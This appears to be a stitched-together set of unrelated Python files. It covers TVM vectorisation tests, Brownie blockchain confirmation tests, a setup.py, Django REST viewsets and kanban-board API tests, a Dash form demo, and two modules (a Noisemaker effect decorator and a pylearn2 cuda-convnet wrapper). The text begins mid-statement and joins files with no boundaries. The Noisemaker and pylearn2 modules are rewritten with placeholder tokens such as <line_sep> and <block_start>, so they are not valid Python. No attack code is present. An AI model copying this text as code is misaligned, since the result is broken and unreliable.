                                           A[k * 4 + i], 0)
    stmt = ib.get()
    assert isinstance(stmt.body, tvm.stmt.For)
    stmt = tvm.ir_pass.VectorizeLoop(stmt)
    assert not isinstance(stmt.body, tvm.stmt.For)
    assert isinstance(stmt.body.value.args[2], tvm.expr.Broadcast)


if __name__ == "__main__":
    test_vectorize_vector()
    test_vectorize_with_if()
    test_vectorize_loop()
    test_vectorize_if_then_else()
    test_vectorize_with_le_cond()
    test_vectorize_with_ge_cond()
from js_reimpl_common import run_op_chapter1_chapter2


def run_op(keys, op, **kwargs):
    """Dispatch *op* (with its kwargs) to the chapter1 JS reimplementation.

    The second argument (values) is always None for chapter1 structures, which
    presumably store keys only — verify against run_op_chapter1_chapter2.
    """
    return run_op_chapter1_chapter2("chapter1", None, keys, op, **kwargs)


def create_new(numbers):
    # Build a fresh structure from `numbers`; no pre-existing keys are passed.
    return run_op(None, "create_new", array=numbers)


def create_new_broken(numbers):
    # Intentionally-broken variant of create_new (used for teaching/demo).
    return run_op(None, "create_new_broken", array=numbers)


def has_key(keys, key):
    # Membership test against an existing key structure.
    return run_op(keys, "has_key", key=key)


def linear_search(numbers, key):
    # Plain linear search over the raw array; no key structure involved.
    return run_op(None, "linear_search", key=key, array=numbers)
"""Effect decorator for Noisemaker Composer Presets"""<import_stmt>inspect<line_sep>EFFECTS={}<def_stmt>effect *args<block_start>"""Function decorator for declaring composable effects."""<def_stmt>decorator_fn func<block_start>argspec=inspect.getfullargspec(func)<line_sep>params=argspec.args<for_stmt>param ["time" "speed"]<block_start><if_stmt>param<not><in>params<block_start><raise>ValueError(f'{func.__name__}() needs to accept a "{param}" keyword arg. Please add it to the function signature.')<block_end><block_end># All effects respond to "tensor", "shape". Removing these non-keyword args should make params the same length as defaults. params.remove("tensor")<line_sep>params.remove("shape")<if_stmt>params<and>len(params)<ne>len(argspec.defaults)<block_start><raise>ValueError(f'Expected {len(argspec.defaults)} keyword params to "{func.__name__}", but got {len(params)}.')<block_end># Register effect name and params name=args[0]<if>args<else>func.__name__<line_sep>EFFECTS[name]=dict((params[i] argspec.defaults[i])<for>i range(len(params)))<line_sep>EFFECTS[name]["func"]=func<line_sep><return>func<block_end><return>decorator_fn<block_end>
import threading
import time

import pytest

import brownie


def send_and_wait_for_tx():
    """Worker used by the multithreading test: fire a transfer without waiting
    for confirmations, then block until it has at least 2."""
    tx = brownie.accounts[0].transfer(brownie.accounts[1], "0.1 ether", required_confs=0, silent=True)
    tx.wait(2)
    assert tx.confirmations >= 2
    assert tx.status == 1


@pytest.fixture
def block_time_network(devnetwork, config, network_name):
    """Provide a network with fixed block mining time of 1 second."""
    config.networks[network_name]["cmd_settings"]["block_time"] = 1
    # Reconnect so the node is relaunched with the new block-time setting.
    devnetwork.disconnect()
    devnetwork.connect(network_name)

    yield devnetwork

    devnetwork.disconnect()


def test_required_confirmations_deploy(accounts, BrownieTester, block_time_network, web3):
    # Deploying with required_confs=3 must not return before 3 blocks passed.
    block = web3.eth.block_number
    accounts[0].deploy(BrownieTester, True, required_confs=3)
    assert web3.eth.block_number - block >= 3


def test_required_confirmations_transfer(accounts, block_time_network, web3):
    # Same guarantee for a plain transfer.
    block = web3.eth.block_number
    tx = accounts[0].transfer(accounts[1], "1 ether", required_confs=3)
    assert tx.confirmations >= 3
    assert web3.eth.block_number - block >= 3


def test_required_confirmations_transact(accounts, BrownieTester, block_time_network, web3):
    # required_confs passed through the tx dict works for both deploy and call.
    block = web3.eth.block_number
    brownieTester = BrownieTester.deploy(True, {"from": accounts[0], "required_confs": 2})
    assert web3.eth.block_number - block >= 2
    block = web3.eth.block_number
    tx = brownieTester.doNothing({"from": accounts[0], "required_confs": 4})
    assert tx.confirmations >= 4
    assert web3.eth.block_number - block >= 4


def test_required_confirmations_zero(accounts, block_time_network, web3):
    # required_confs=0 returns immediately with a pending (-1) status ...
    block = web3.eth.block_number
    tx = accounts[0].transfer(accounts[1], "1 ether", required_confs=0)
    assert tx.status == -1
    assert web3.eth.block_number - block == 0
    # ... and the tx confirms on its own once a block is mined (~1s).
    time.sleep(1.5)
    assert tx.status == 1
    assert tx.confirmations >= 1


def test_wait_for_confirmations(accounts, block_time_network):
    tx = accounts[0].transfer(accounts[1], "1 ether", required_confs=1)
    tx.wait(3)
    # A block may be mined between wait() returning and the check.
    assert tx.confirmations in [3, 4]
    # Waiting for fewer confirmations than already reached is a no-op.
    tx.wait(2)
    tx.wait(5)
    assert tx.confirmations >= 5


def test_pending_nonce(accounts, block_time_network):
    # Three un-mined transactions: pending nonce counts them, confirmed doesn't.
    for _ in range(3):
        accounts[0].transfer(accounts[1], "0.1 ether", required_confs=0, silent=True)

    assert accounts[0]._pending_nonce() == 3
    assert accounts[0].nonce < 3
    time.sleep(3.5)
    assert accounts[0].nonce == 3


def test_multithreading(accounts, history, block_time_network):
    # Concurrent senders must each end up confirmed without nonce collisions.
    threads = []
    for _ in range(3):
        thread = threading.Thread(target=send_and_wait_for_tx, daemon=True)
        threads.append(thread)
        thread.start()
    for thread in threads:
        thread.join()
    for tx in history:
        assert tx.status == 1
        assert tx.confirmations >= 2
"""Packaging script for the ``energyusage`` distribution."""
# NOTE(review): find_packages is imported but never used; PACKAGES is
# hard-coded instead.
from setuptools import setup, find_packages

# Read the project README so PyPI can render it as the long description.
with open("README.md", "r") as fh:
    long_description = fh.read()

NAME = "energyusage"
VERSION = "0.0.13"
DESCRIPTION = "Measuring the environmental impact of computation"
LONG_DESCRIPTION = long_description
LONG_DESCRIPTION_CONTENT_TYPE = 'text/markdown'
URL = "https://github.com/responsibleproblemsolving/energy-usage"
AUTHOR = "<NAME>, <NAME>, <NAME>"
AUTHOR_EMAIL = "<EMAIL>"
LICENSE = "Apache 2.0"
CLASSIFIERS = [
    "Programming Language :: Python :: 3",
    "License :: OSI Approved :: Apache Software License",
    "Operating System :: OS Independent",
]
PACKAGES = ['energyusage']
# NOTE(review): PACKAGE_DATA keys name sub-packages ('energyusage.data.csv',
# 'energyusage.data.json') that are not listed in PACKAGES, and PACKAGE_DIR
# remaps 'energyusage.data' to a top-level 'data' directory — verify the CSV
# and JSON files are actually included in built distributions.
PACKAGE_DATA = {'energyusage.data.csv': ['*.csv'], 'energyusage.data.json': ['*.json']}
INCLUDE_PACKAGE_DATA = True
PACKAGE_DIR = {'energyusage.data': 'data'}
INSTALL_REQUIRES = ['requests', 'reportlab']

setup(
    name=NAME,
    version=VERSION,
    description=DESCRIPTION,
    long_description=LONG_DESCRIPTION,
    long_description_content_type=LONG_DESCRIPTION_CONTENT_TYPE,
    url=URL,
    author=AUTHOR,
    author_email=AUTHOR_EMAIL,
    license=LICENSE,
    classifiers=CLASSIFIERS,
    packages=PACKAGES,
    package_data=PACKAGE_DATA,
    include_package_data=INCLUDE_PACKAGE_DATA,
    package_dir=PACKAGE_DIR,
    install_requires=INSTALL_REQUIRES)
from core.models import ProviderType
from api.v2.serializers.details import ProviderTypeSerializer
from api.v2.views.base import AuthModelViewSet


class ProviderTypeViewSet(AuthModelViewSet):
    """
    Read-only API endpoint exposing the list of provider types.

    Only safe HTTP methods are allowed (see ``http_method_names``), so
    provider types cannot be created, updated, or deleted through this view.
    """
    # Every provider type is visible to any authenticated user.
    queryset = ProviderType.objects.all()
    serializer_class = ProviderTypeSerializer
    # Restrict the viewset to read-only access.
    http_method_names = ['get', 'head', 'options', 'trace']
import dash_bootstrap_components as dbc
from dash import html

from .util import make_subheading

# Demo "Form" section: a username field and a password field, each made of a
# label, an input, and a FormText help line containing a recovery link.
form = html.Div(
    [
        make_subheading("Form", "form"),
        dbc.Form(
            [
                # Username field
                html.Div(
                    [
                        dbc.Label("Username"),
                        dbc.Input(
                            placeholder="Enter your username",
                            type="text",
                        ),
                        dbc.FormText(
                            [
                                "Can't remember your username? ",
                                html.A(
                                    "Click here.",
                                    href="#",
                                    className="text-muted",
                                    style={"textDecoration": "underline"},
                                ),
                            ]
                        ),
                    ]
                ),
                # Password field.
                # Fix: the label previously read "Username" (copy-paste bug);
                # the input and help text below are clearly for the password.
                html.Div(
                    [
                        dbc.Label("Password"),
                        dbc.Input(
                            placeholder="Enter your password",
                            type="password",
                        ),
                        dbc.FormText(
                            [
                                "Can't remember your password? ",
                                html.A(
                                    "Click here.",
                                    href="#",
                                    className="text-muted",
                                    style={"textDecoration": "underline"},
                                ),
                            ]
                        ),
                    ]
                ),
            ]
        ),
    ],
    className="mb-4",
)
"""API tests for the boards app: column/task sorting, board CRUD and
membership management, and label handling.

Relies on external fixtures (``api_client``, ``api_client_with_credentials``,
``create_user``, the ``*_factory`` fixtures, and the user fixtures ``steve``,
``amy``, ``leo``, ``mike``) provided by the project's conftest.
"""
import pytest
from django.contrib.auth import get_user_model
from rest_framework.reverse import reverse

from boards.models import Column, Board, Task

User = get_user_model()


@pytest.fixture
def board(create_user):
    # A board owned by a fresh user who is also a member.
    user = create_user()
    uni_board = Board.objects.create(name="University", owner=user)
    uni_board.members.add(user)
    return uni_board


@pytest.fixture
def col_backlog(board):
    # First column on the shared board fixture.
    return Column.objects.create(board=board, title="Backlog", column_order=1)


@pytest.fixture
def col_done(board):
    # Second column on the shared board fixture.
    return Column.objects.create(board=board, title="Done", column_order=2)


def test_order_columns(api_client_with_credentials, col_backlog, col_done):
    """
    Order columns:
    Backlog, Done -> Done, Backlog
    """
    response = api_client_with_credentials.post(reverse("sort-column"), {"order": [col_done.id, col_backlog.id]})
    col_backlog.refresh_from_db()
    col_done.refresh_from_db()
    assert response.status_code == 200
    assert col_done.column_order == 1
    assert col_backlog.column_order == 2


def test_order_tasks_same_column(api_client_with_credentials, column_factory, task_factory):
    """
    Order tasks (in one column):
    Task1, Task2, Task3 -> Task3, Task1, Task2
    """
    column = column_factory()
    task1 = task_factory(column=column, task_order=1)
    task2 = task_factory(column=column, task_order=2)
    task3 = task_factory(column=column, task_order=3)
    # Initial state
    column.refresh_from_db()
    assert list(column.tasks.all()) == [task1, task2, task3]
    response = api_client_with_credentials.post(
        reverse("sort-task"),
        {
            "board": column.board.id,
            "tasks": {column.id: [task3.id, task1.id, task2.id]},
            "order": [task3.id, task1.id, task2.id],
        },
    )
    assert response.status_code == 200
    # State after ordering
    column.refresh_from_db()
    assert list(column.tasks.all()) == [task3, task1, task2]


def test_order_tasks_between_two_columns(api_client_with_credentials, board_factory, column_factory, task_factory):
    """
    Order tasks between two columns:
    Column1: Task1, Task2, Task3
    Column2: Task4, Task5
    After order:
    Column1: Task1, Task3
    Column2: Task4, Task2, Task5
    """
    board = board_factory()
    column1 = column_factory(board=board)
    column2 = column_factory(board=board)
    task1 = task_factory(column=column1, task_order=1)
    task2 = task_factory(column=column1, task_order=2)
    task3 = task_factory(column=column1, task_order=3)
    task4 = task_factory(column=column2, task_order=4)
    task5 = task_factory(column=column2, task_order=5)
    # Initial state
    column1.refresh_from_db()
    column2.refresh_from_db()
    assert list(column1.tasks.all()) == [task1, task2, task3]
    assert list(column2.tasks.all()) == [task4, task5]
    response = api_client_with_credentials.post(
        reverse("sort-task"),
        {
            "board": column1.board.id,
            "tasks": {
                column1.id: [task1.id, task3.id],
                column2.id: [task4.id, task2.id, task5.id],
            },
            "order": [task1.id, task3.id, task4.id, task2.id, task5.id],
        },
    )
    assert response.status_code == 200
    # State after ordering
    column1.refresh_from_db()
    column2.refresh_from_db()
    assert list(column1.tasks.all()) == [task1, task3]
    assert list(column2.tasks.all()) == [task4, task2, task5]


def test_invalid_move_atomic(api_client_with_credentials, board_factory, column_factory, task_factory):
    """A sort request placing the same tasks in two columns is rejected and
    must not partially apply (the whole move is atomic)."""
    board = board_factory()
    col1 = column_factory(board=board)
    col2 = column_factory(board=board)
    col3 = column_factory(board=board)
    col1_task = task_factory(column=col1, task_order=1)
    col2_task = task_factory(column=col2, task_order=2)
    response = api_client_with_credentials.post(
        reverse("sort-task"),
        {
            "board": board.id,
            "tasks": {
                col1.id: [col1_task.id, col2_task.id],
                col3.id: [col1_task.id, col2_task.id],
            },
            "order": [col1_task.id, col2_task.id],
        },
    )
    assert response.status_code == 400
    # State should remain the same
    col1.refresh_from_db()
    col2.refresh_from_db()
    col3.refresh_from_db()
    assert list(col1.tasks.all()) == [col1_task]
    assert list(col2.tasks.all()) == [col2_task]
    assert list(col3.tasks.all()) == []


def test_can_not_order_tasks_between_two_boards(api_client_with_credentials, board_factory, column_factory, task_factory):
    """Moving a task into a column that belongs to another board is rejected."""
    board1 = board_factory()
    board2 = board_factory()
    board1_col = column_factory(board=board1)
    board2_col = column_factory(board=board2)
    board1_task = task_factory(column=board1_col, task_order=1)
    board2_task = task_factory(column=board2_col, task_order=2)
    response = api_client_with_credentials.post(
        reverse("sort-task"),
        {
            "board": board1.id,
            "tasks": {
                board1_col.id: [],
                board2_col.id: [board1_task.id, board2_task.id],
            },
            "order": [board1_task.id, board2_task.id],
        },
    )
    assert response.status_code == 400


def test_order_duplicate(api_client_with_credentials, col_done):
    """A column order containing duplicate ids is rejected."""
    response = api_client_with_credentials.post(reverse("sort-column"), {"order": [col_done.id, col_done.id]})
    assert response.status_code == 400


@pytest.mark.parametrize(
    "post_data,expected_status_code",
    [
        ({"order": [1, 2]}, 200),
        ({"order": [1, 1]}, 400),
        ({"order": [-1]}, 400),
        ({"order": "nope"}, 400),
        ({"order": {"asd"}}, 400),
        ({"other": "bad data"}, 400),
        ({}, 400),
    ],
)
def test_order_column_status_code(post_data, expected_status_code, api_client_with_credentials, board):
    """Malformed sort-column payloads return 400; a valid one returns 200."""
    Column.objects.create(id=1, board=board, title="col1")
    Column.objects.create(id=2, board=board, title="col2")
    response = api_client_with_credentials.post(reverse("sort-column"), post_data)
    assert response.status_code == expected_status_code


def test_board_list(api_client, steve, amy, leo):
    """The board list is visible only to the board's owner and members."""
    uni_board = Board.objects.create(name="University", owner=steve)
    uni_board.members.set([steve, amy])
    get_board_list = lambda: api_client.get(reverse("board-list"))
    # Not authenticated
    response = get_board_list()
    assert response.status_code == 401
    # Owner can see his own boards
    api_client.force_authenticate(user=steve)
    response = get_board_list()
    assert response.status_code == 200
    assert len(response.data) == 1
    # Members can see the their boards
    api_client.force_authenticate(user=amy)
    response = get_board_list()
    assert response.status_code == 200
    assert len(response.data) == 1
    # Not part of any boards, can't see any
    api_client.force_authenticate(user=leo)
    response = get_board_list()
    assert response.status_code == 200
    assert len(response.data) == 0


def test_board_detail(api_client, steve, amy, leo):
    """Board detail is visible to owner and members; 404 for outsiders."""
    uni_board = Board.objects.create(name="University", owner=steve)
    uni_board.members.set([steve, amy])
    get_uni_board_detail = lambda: api_client.get(reverse("board-detail", kwargs={"pk": uni_board.id}))
    # Not authenticated
    response = get_uni_board_detail()
    assert response.status_code == 401
    # Owner can see his own board
    api_client.force_authenticate(user=steve)
    response = get_uni_board_detail()
    assert response.status_code == 200
    assert response.data["name"] == "University"
    # Member can see the board
    api_client.force_authenticate(user=amy)
    response = get_uni_board_detail()
    assert response.status_code == 200
    assert response.data["name"] == "University"
    # Not part of the board, can't see it
    api_client.force_authenticate(user=leo)
    response = get_uni_board_detail()
    assert response.status_code == 404


def test_board_delete(api_client, steve, amy, leo):
    """Only the board owner may delete a board (members get 403)."""
    uni_board = Board.objects.create(name="University", owner=steve)
    uni_board.members.set([steve, amy])
    delete_uni_board = lambda: api_client.delete(reverse("board-detail", kwargs={"pk": uni_board.id}))
    # Not authenticated
    response = delete_uni_board()
    assert response.status_code == 401
    assert Board.objects.filter(id=uni_board.id).exists()
    # Not part of the board, can't see it
    api_client.force_authenticate(user=leo)
    response = delete_uni_board()
    assert response.status_code == 404
    assert Board.objects.filter(id=uni_board.id).exists()
    # Member can't delete the board
    api_client.force_authenticate(user=amy)
    response = delete_uni_board()
    assert response.status_code == 403
    assert Board.objects.filter(id=uni_board.id).exists()
    # Owner can see his own board
    api_client.force_authenticate(user=steve)
    response = delete_uni_board()
    assert response.status_code == 204
    assert not Board.objects.filter(id=uni_board.id).exists()


def test_board_create(api_client, steve, amy):
    """Creating a board makes the creator both owner and sole member."""
    assert len(Board.objects.all()) == 0
    create_board = lambda: api_client.post(reverse("board-list"), {"name": "Pets"})
    # Not authenticated
    response = create_board()
    assert response.status_code == 401
    assert len(Board.objects.all()) == 0
    # Steve should be owner and member after creation
    api_client.force_authenticate(user=steve)
    response = create_board()
    assert response.status_code == 201
    assert len(Board.objects.all()) == 1
    pets = Board.objects.get(name="Pets")
    assert pets.owner == steve
    assert list(pets.members.all()) == [steve]
    # Amy should not see any boards
    api_client.force_authenticate(user=amy)
    response = api_client.get(reverse("board-list"))
    assert response.status_code == 200
    assert len(response.data) == 0


def test_board_invite_member(api_client, board_factory, steve, leo, amy):
    """Only the owner may invite; duplicate and unknown users are handled."""
    board = board_factory(owner=steve)
    board.members.set([leo, steve])
    # Initially there are two members
    assert len(board.members.all()) == 2
    send_invite = lambda users_ids: api_client.post(
        reverse("board-invite-member", kwargs={"pk": board.id}), {"users": users_ids}
    )
    # Not authenticated
    response = send_invite([amy.id])
    assert response.status_code == 401
    assert len(board.members.all()) == 2
    # Leo is not an owner and should not be able to invite others
    api_client.force_authenticate(user=leo)
    response = send_invite([amy.id])
    assert response.status_code == 403
    assert len(board.members.all()) == 2
    # Steve as the owner should be able to successfully invite Amy
    api_client.force_authenticate(user=steve)
    response = send_invite([amy.id])
    assert response.status_code == 200
    assert len(board.members.all()) == 3
    assert amy.id in list(map(lambda member: member.id, board.members.all()))
    # Should handle adding an existing member
    response = send_invite([steve.id])
    assert response.status_code == 200
    assert len(board.members.all()) == 3
    # Should handle adding non existant user
    response = send_invite([-1])
    assert response.status_code == 400
    assert len(board.members.all()) == 3


def test_board_remove_member(api_client, board_factory, column_factory, task_factory, steve, leo, amy, mike):
    """Only the owner may remove members; removal also unassigns their tasks;
    the owner, non-members, and unknown usernames cannot be removed."""
    board = board_factory(owner=steve)
    board.members.set([steve, leo, amy])
    column = column_factory(board=board)
    task = task_factory(column=column)
    # Initially there are two members
    assert len(board.members.all()) == 3
    remove_member = lambda username: api_client.post(
        reverse("board-remove-member", kwargs={"pk": board.id}), {"username": username}
    )
    # Not authenticated
    response = remove_member(leo.username)
    assert response.status_code == 401
    assert len(board.members.all()) == 3
    # Leo should not be able to remove Amy (Leo isn't the owner)
    api_client.force_authenticate(user=leo)
    response = remove_member(amy.username)
    assert response.status_code == 403
    assert len(board.members.all()) == 3
    # Steve can't remove himself (the owner)
    api_client.force_authenticate(user=steve)
    response = remove_member(steve.username)
    assert response.status_code == 400
    assert len(board.members.all()) == 3
    # Steve can't remove Mike (not a member of the board)
    response = remove_member(mike.username)
    assert response.status_code == 400
    assert len(board.members.all()) == 3
    # Steve can't remove a non existant user
    response = remove_member("notvalidusername")
    assert response.status_code == 400
    assert len(board.members.all()) == 3
    # Steve can remove Leo, should also remove Leo from tasks
    task.assignees.set([leo])
    assert len(task.assignees.all()) == 1
    response = remove_member(leo.username)
    assert response.status_code == 200
    assert len(board.members.all()) == 2
    assert leo.id not in list(map(lambda member: member.id, board.members.all()))
    assert len(task.assignees.all()) == 0


def test_update_task_title(api_client, task_factory, steve, amy):
    """Only board members may update a task; outsiders get 404."""
    task = task_factory(title="Landing page design")
    board = task.column.board
    board.members.set([steve])
    new_title = "Admin page permissions"
    update_title = lambda: api_client.patch(reverse("task-detail", kwargs={"pk": task.id}), {"title": new_title})
    # Not authenticated
    response = update_title()
    assert response.status_code == 401
    # Amy not a member, doesn't know about the task
    api_client.force_authenticate(user=amy)
    response = update_title()
    assert response.status_code == 404
    # Steve is a board member, can update
    api_client.force_authenticate(user=steve)
    response = update_title()
    task.refresh_from_db()
    assert response.status_code == 200
    assert task.title == new_title


def test_delete_task(api_client, task_factory, steve, amy):
    """Only board members may delete a task; outsiders get 404."""
    task = task_factory()
    board = task.column.board
    board.members.set([steve])
    delete_task = lambda: api_client.delete(reverse("task-detail", kwargs={"pk": task.id}))
    # Not authenticated
    response = delete_task()
    assert response.status_code == 401
    # Amy not a member, doesn't know about the task
    api_client.force_authenticate(user=amy)
    response = delete_task()
    assert response.status_code == 404
    # Steve is a board member, can delete
    api_client.force_authenticate(user=steve)
    response = delete_task()
    assert response.status_code == 204
    assert not Task.objects.filter(id=task.id).exists()


def test_update_column_title(api_client, column_factory, steve, amy):
    """Only board members may rename a column; outsiders get 404."""
    column = column_factory(title="On Hold")
    board = column.board
    board.members.set([steve])
    new_title = "Ready"
    update_column_title = lambda: api_client.patch(
        reverse("column-detail", kwargs={"pk": column.id}), {"title": new_title}
    )
    # Not authenticated
    response = update_column_title()
    assert response.status_code == 401
    # Amy not a member, doesn't know about the column
    api_client.force_authenticate(user=amy)
    response = update_column_title()
    assert response.status_code == 404
    # Steve is a board member, can update
    api_client.force_authenticate(user=steve)
    response = update_column_title()
    column.refresh_from_db()
    assert response.status_code == 200
    assert column.title == new_title


def test_create_column(api_client, board_factory, steve, amy):
    """Only board members may add a column to a board."""
    board = board_factory(name="Internals")
    board.members.set([steve])
    column_data = {"title": "Send verification email on Regiser", "board": board.id}
    create_column = lambda post_data: api_client.post(reverse("column-list"), post_data)
    # Not authenticated
    response = create_column(column_data)
    assert response.status_code == 401
    # Amy not a member
    api_client.force_authenticate(user=amy)
    response = create_column(column_data)
    assert response.status_code == 400
    assert response.data[0] == "Must be a member of the board!"
    # Steve is a board member, can create
    api_client.force_authenticate(user=steve)
    response = create_column(column_data)
    assert response.status_code == 201
    assert Column.objects.filter(title=column_data["title"]).exists()


def test_create_task(api_client, column_factory, steve, amy):
    """Only board members may create tasks, and assignees must be members."""
    column = column_factory(title="Blocked")
    board = column.board
    board.members.set([steve])
    task_data = {
        "title": "Send verification email on Regiser",
        "description": "<p>Send a verification email when a new user registers. "
        "Email template is provided by Dave.</p><p><br></p><p>Use our main SMTP provider.</p>",
        "column": column.id,
        "labels": [],
        "assignees": [steve.id],
        "priority": "H",
    }
    create_task = lambda post_data: api_client.post(reverse("task-list"), post_data)
    # Not authenticated
    response = create_task(task_data)
    assert response.status_code == 401
    # Amy not a member
    assert amy not in board.members.all()
    api_client.force_authenticate(user=amy)
    response = create_task(task_data)
    assert response.status_code == 400
    assert response.data[0] == "Must be a member of the board!"
    # One of the assignees (amy) is not a member
    api_client.force_authenticate(user=steve)
    response = create_task({**task_data, "assignees": [steve.id, amy.id]})
    assert response.status_code == 400
    assert response.data[0] == "Can't assign someone who isn't a board member!"
    # Steve is a board member, can create
    api_client.force_authenticate(user=steve)
    response = create_task(task_data)
    assert response.status_code == 201
    assert Task.objects.filter(title=task_data["title"]).exists()


def test_only_board_members_see_labels(api_client, board_factory, label_factory, steve, amy):
    """Labels are only visible to members of the label's board."""
    board = board_factory(name="Internals")
    board.members.set([steve])
    label = label_factory(name="Documentation", board=board)
    get_label = lambda: api_client.get(reverse("label-detail", kwargs={"pk": label.id}))
    # Steve is a board member, can get label
    api_client.force_authenticate(user=steve)
    response = get_label()
    assert response.status_code == 200
    # Amy is a not a board member, doesn't know about the label
    api_client.force_authenticate(user=amy)
    response = get_label()
    assert response.status_code == 404


def test_add_labels_to_task(api_client, board_factory, column_factory, task_factory, label_factory, steve, amy):
    """Only members may label tasks, and only with labels from the same board."""
    board1 = board_factory()
    board1.members.set([steve])
    board2 = board_factory()
    column1 = column_factory(board=board1)
    label1 = label_factory(board=board1)
    label2 = label_factory(board=board2)
    task1 = task_factory(column=column1)
    add_labels = lambda labels: api_client.patch(reverse("task-detail", kwargs={"pk": task1.id}), {"labels": labels})
    # Can't add a label when not a member
    api_client.force_authenticate(user=amy)
    response = add_labels([label1.id])
    task1.refresh_from_db()
    assert response.status_code == 404
    assert len(task1.labels.all()) == 0
    # Can't add a label from a different board
    api_client.force_authenticate(user=steve)
    response = add_labels([label1.id, label2.id])
    task1.refresh_from_db()
    assert response.status_code == 400
    assert response.data[0] == "Can't set a label that doesn't belong to the board!"
    assert len(task1.labels.all()) == 0
    # Can add a label of this board as member
    api_client.force_authenticate(user=steve)
    response = add_labels([label1.id])
    task1.refresh_from_db()
    assert response.status_code == 200
    assert [label.id for label in task1.labels.all()] == [label1.id]


def test_label_names_unique_per_board(api_client, board_factory, label_factory, steve, amy):
    """Renaming a label to a name already used on the same board fails."""
    board = board_factory()
    board.members.set([steve])
    label1 = label_factory(board=board, name="Hotfix")
    label_factory(board=board, name="Bug")
    api_client.force_authenticate(user=steve)
    response = api_client.patch(reverse("label-detail", kwargs={"pk": label1.id}), {"name": "Bug"})
    assert response.status_code == 400
""" Base class for wrapping """<line_sep>__authors__="<NAME>"<line_sep>__copyright__="Copyright 2010-2012, Universite de Montreal"<line_sep>__credits__=["<NAME>" "<NAME>"]<line_sep>__license__="3-clause BSD"<line_sep>__maintainer__="<NAME>"<line_sep>__email__="<EMAIL>"<line_sep>""" This module may contain code copied directly or modified from cuda-convnet. The copyright and licensing notice for this code is reproduced below: /* * Copyright (c) 2011, <NAME> (<EMAIL>) * All rights reserved. * * Redistribution and use in source and binary forms, with or without * modification, are permitted provided that the following conditions are met: * * - Redistributions of source code must retain the above copyright notice, * this list of conditions and the following disclaimer. * * - Redistributions in binary form must reproduce the above copyright notice, * this list of conditions and the following disclaimer in the documentation * and/or other materials provided with the distribution. * * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" * AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE * ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE * LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR * CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF * SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS * INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN * CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING * NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, * EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. 
*/ """<import_stmt>warnings<import_stmt>theano<import_from_stmt>theano.compat get_unbound_function<import_from_stmt>theano config<import_from_stmt>theano.sandbox.cuda GpuOp<import_from_stmt>pylearn2.sandbox.cuda_convnet.shared_code this_dir<import_from_stmt>pylearn2.sandbox.cuda_convnet.convnet_compile convnet_available<import_from_stmt>pylearn2.sandbox.cuda_convnet.convnet_compile cuda_convnet_loc<import_from_stmt>pylearn2.utils py_integer_types<import_stmt>pylearn2.sandbox.cuda_convnet.pthreads<class_stmt>BaseActs(GpuOp)<block_start>""" Shared code for wrapping various convnet operations. """<def_stmt>__init__ self pad=0 partial_sum=<none> stride=1<block_start><if_stmt><not>isinstance(pad py_integer_types)<block_start><raise>TypeError("pad must be an int")<block_end><if_stmt><not>(pad<ge>0)<block_start><raise>ValueError("bad value of pad (must be non-negative): "+str(pad))<block_end>self.partial_sum=partial_sum<line_sep>self.pad=pad<line_sep>self.stride=stride<line_sep>self.copy_non_contiguous=0<line_sep># TODO: support sparse connectivity pattern self.dense_connectivity=<true><block_end><def_stmt>c_header_dirs self<block_start><if_stmt>config.pthreads.inc_dir<block_start><return>[this_dir config.pthreads.inc_dir]<block_end><else_stmt><block_start><return>[this_dir]<block_end><block_end><def_stmt>c_headers self<block_start><return>['nvmatrix.cuh' 'cudaconv2.cuh']<block_end><def_stmt>c_code_cache_version self<block_start>warnings.warn("No C-code cache version for %s"%self.__class__.__name__)<line_sep><return>()<block_end><def_stmt>c_lib_dirs self<block_start><if_stmt>config.pthreads.lib_dir<block_start><return>[cuda_convnet_loc config.pthreads.lib_dir]<block_end><else_stmt><block_start><return>[cuda_convnet_loc]<block_end><block_end><def_stmt>c_libraries self<block_start><if_stmt>config.pthreads.lib<block_start><return>['cuda_convnet' 
config.pthreads.lib]<block_end><else_stmt><block_start><return>['cuda_convnet']<block_end><block_end><def_stmt>_argument_contiguity_check self arg_name<block_start><return>""" if (!CudaNdarray_is_c_contiguous(%%(%(arg_name)s)s)) { if (!(%(class_name_caps)s_COPY_NON_CONTIGUOUS)) { PyErr_SetString(PyExc_ValueError, "%(class)s: %(arg_name)s must be C contiguous"); %%(fail)s; } } """%{'class':self.__class__.__name__ 'arg_name':arg_name 'class_name_caps':self.__class__.__name__.upper() }<block_end><def_stmt>_argument_dimension_check self arg_name ndim<block_start><return>""" if (%%(%(arg_name)s)s->nd != %(ndim)d) { PyErr_Format(PyExc_ValueError, "%(arg_name)s must have ndim=%(ndim)d, got nd=%%%%i", %%(%(arg_name)s)s->nd); %%(fail)s; } """%locals()<block_end><def_stmt>__eq__ self other<block_start><return>(type(self)<eq>type(other)<and>self.partial_sum<eq>other.partial_sum<and>self.pad<eq>other.pad<and>self.dense_connectivity<eq>other.dense_connectivity<and>self.stride<eq>other.stride<and>self.copy_non_contiguous<eq>other.copy_non_contiguous)<block_end><def_stmt>__hash__ self<block_start>msg=[]<line_sep>msg.append(self.__class__.__name__)<for_stmt>val (self.partial_sum self.pad self.dense_connectivity self.stride self.copy_non_contiguous)<block_start>msg.append(str(val))<block_end><return>hash(tuple(msg))<block_end># Make sure the cuda_convnet library is compiled and up-to-date <def_stmt>make_thunk self *args **kwargs<block_start><if_stmt><not>convnet_available()<block_start><raise>RuntimeError('Could not compile cuda_convnet')<block_end><return>super(BaseActs self).make_thunk(*args **kwargs)<block_end><block_end># This is needed as otherwise DebugMode will consider that # BaseActs.make_thunk do something else then the default code, and # would duplicate verification. 
